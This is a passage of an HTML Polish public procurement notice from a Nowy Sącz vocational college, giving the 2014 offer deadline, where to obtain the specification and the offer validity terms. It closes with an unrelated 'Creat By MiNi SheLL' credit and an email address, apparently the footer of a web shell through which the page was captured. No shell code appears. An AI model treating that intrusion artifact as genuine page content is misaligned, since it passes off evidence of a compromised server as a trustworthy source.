i usług (VAT), 3) zmiany osób wymienionych w umowie, przy pomocy których Wykonawca realizuje przedmiot zamówienia (śmierć, choroba, rezygnacja lub inne zdarzenie losowe)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zp.pwsz-ns.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rektorat Państwowej Wyższej Szkoły Zawodowej w Nowym Sączu przy ul. Staszica 1, pok. nr 17.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2014 godzina 12:45, miejsce: Państwowa Wyższa Szkoła Zawodowa w Nowym Sączu, 33-300 Nowy Sącz, ul. Staszica 1 - Sekretariat Ogólny - pokój 16 (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com